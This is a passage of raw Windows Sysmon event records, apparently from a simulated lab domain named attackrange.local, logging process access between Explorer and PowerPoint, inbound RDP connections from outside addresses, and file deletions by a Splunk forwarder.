Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8|C:\Windows\System32\SHELL32.dll+13edbb|C:\Windows\System32\SHELL32.dll+13ef27|C:\Windows\System32\SHELL32.dll+2e893d|C:\Windows\System32\USER32.dll+121e4 10341000x800000000000000081653Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.044{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8 10341000x800000000000000081652Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.044{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\system32\explorerframe.dll+28f5c|C:\Windows\system32\explorerframe.dll+28eb7|C:\Windows\system32\explorerframe.dll+2a6e4|C:\Windows\system32\explorerframe.dll+611e6|C:\Windows\system32\explorerframe.dll+5a750|C:\Windows\System32\comdlg32.dll+1e967|C:\Windows\System32\shlwapi.dll+9fc1|C:\Windows\System32\shlwapi.dll+9edd|C:\Windows\System32\shlwapi.dll+9d96|C:\Windows\System32\shlwapi.dll+9c0d|C:\Windows\System32\SHELL32.dll+13fd37|C:\Windows\System32\SHELL32.dll+13f1b8|C:\Windows\System32\SHELL32.dll+13edbb 10341000x800000000000000081651Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.044{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da75e|C:\Windows\System32\windows.storage.dll+dab96|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814 10341000x800000000000000081650Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da875|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f|C:\Windows\System32\SHELL32.dll+13fb0e|C:\Windows\System32\SHELL32.dll+13f726|C:\Windows\System32\SHELL32.dll+13f1a3|C:\Windows\System32\SHELL32.dll+13edbb 10341000x800000000000000081649Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7f1|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f|C:\Windows\System32\SHELL32.dll+13fb0e|C:\Windows\System32\SHELL32.dll+13f726|C:\Windows\System32\SHELL32.dll+13f1a3|C:\Windows\System32\SHELL32.dll+13edbb 10341000x800000000000000081648Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f 10341000x800000000000000081647Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7d5|C:\Windows\System32\windows.storage.dll+da993|C:\Windows\System32\windows.storage.dll+dae28|C:\Windows\System32\windows.storage.dll+db1db|C:\Windows\System32\windows.storage.dll+d1ab1|C:\Windows\System32\windows.storage.dll+d3426|C:\Windows\System32\windows.storage.dll+d3ca1|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+6e6dc|C:\Windows\System32\SHELL32.dll+6e225|C:\Windows\System32\SHELL32.dll+6ed3d|C:\Windows\System32\SHELL32.dll+7235f|C:\Windows\System32\SHELL32.dll+13fb0e 10341000x800000000000000081646Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.028{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81cf7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BFF145)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x800000000000000081645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.012{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81b7d|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+2e8069|C:\Windows\System32\SHELL32.dll+23660e|C:\Windows\System32\SHELL32.dll+2e517b|C:\Windows\System32\SHELL32.dll+42d74d|C:\Windows\System32\SHELL32.dll+42c3e4|C:\Windows\system32\explorerframe.dll+104960|C:\Windows\system32\explorerframe.dll+a7e78|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612 10341000x800000000000000081644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.012{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81af9|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+2e8069|C:\Windows\System32\SHELL32.dll+23660e|C:\Windows\System32\SHELL32.dll+2e517b|C:\Windows\System32\SHELL32.dll+42d74d|C:\Windows\System32\SHELL32.dll+42c3e4|C:\Windows\system32\explorerframe.dll+104960|C:\Windows\system32\explorerframe.dll+a7e78|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58612 10341000x800000000000000081643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.012{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+2e8069|C:\Windows\System32\SHELL32.dll+23660e|C:\Windows\System32\SHELL32.dll+2e517b|C:\Windows\System32\SHELL32.dll+42d74d|C:\Windows\System32\SHELL32.dll+42c3e4|C:\Windows\system32\explorerframe.dll+104960|C:\Windows\system32\explorerframe.dll+a7e78|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770 10341000x800000000000000081642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.012{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81add|C:\Windows\System32\SHELL32.dll+82223|C:\Windows\System32\SHELL32.dll+82154|C:\Windows\System32\SHELL32.dll+81a02|C:\Windows\System32\SHELL32.dll+2e8069|C:\Windows\System32\SHELL32.dll+23660e|C:\Windows\System32\SHELL32.dll+2e517b|C:\Windows\System32\SHELL32.dll+42d74d|C:\Windows\System32\SHELL32.dll+42c3e4|C:\Windows\system32\explorerframe.dll+104960|C:\Windows\system32\explorerframe.dll+a7e78|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\Comctl32.dll+58547 354300x800000000000000050743Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:08.069{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55373-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050742Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:10.162{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97812E50A7597F8360EFBB42A046A6EF,SHA256=6156096357650FC1CC5C9D569F61E56E66D4B9347AA3DBD248A87ED3ED0A024F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:11.903{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E968555F4699E9B4542D5C9D6E8DF92,SHA256=026D372D5464457548CB8928FED8A5B83F95503A8CA9701853D0038248E27AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:11.403{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C8A2689F7BFE417FADBD137917AF7A06,SHA256=AF9B0D7EF8B0292D241FEE5F93910029BBFFF8CCCF0C7C4C1956327661CE9B9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:09.610{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-1818-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050747Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:09.476{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53903-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000050746Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:08.996{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64558-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050745Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:11.163{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0021C9E7233D8453305A9770006B5F08,SHA256=90C4165F969C3005C4FB475CC27964B3975FAD0ABB7BE9C9383BF563D2E12E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050744Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:11.131{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1804ED036FF5934977FCD4A5B1D0CC22,SHA256=4275168D9573D0878E0FD6B86997B1A0CE023D6E603E1C76C5382F53613EAF12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:12.934{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C053CA4D186D54EAE5654C00AD8A4316,SHA256=ED5287B0111712795280B1D156F3EEDC39AD32DB5D0A43929343B582DC184DC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:10.609{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com50028-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000050749Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:10.831{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52546-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050748Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:12.178{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58D78403D30DC48E786F5E7C0577CB05,SHA256=1E4284C38879B4EDA91D71987DD94AEBA267558EA964EDACB345984F77809B37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.950{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C8B748A209D9ADB44CBE20336C25ED9,SHA256=3657507FCC3B2ADB1985734E494676A529D201D399C502C47383FB856BA0D880,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.809{A7A01FEF-C0A6-607E-8105-00000000BB01}8364040C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.793{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.793{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:13.481{A7A01FEF-EC23-607E-A70E-00000000BB01}944NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.datMD5=FBA051869D54D8554F93018558739DD6,SHA256=3DD430B5889EC276FB1F7FE97699BC7608BF408EB14B4F05E1282A5DE652A4D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:11.312{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 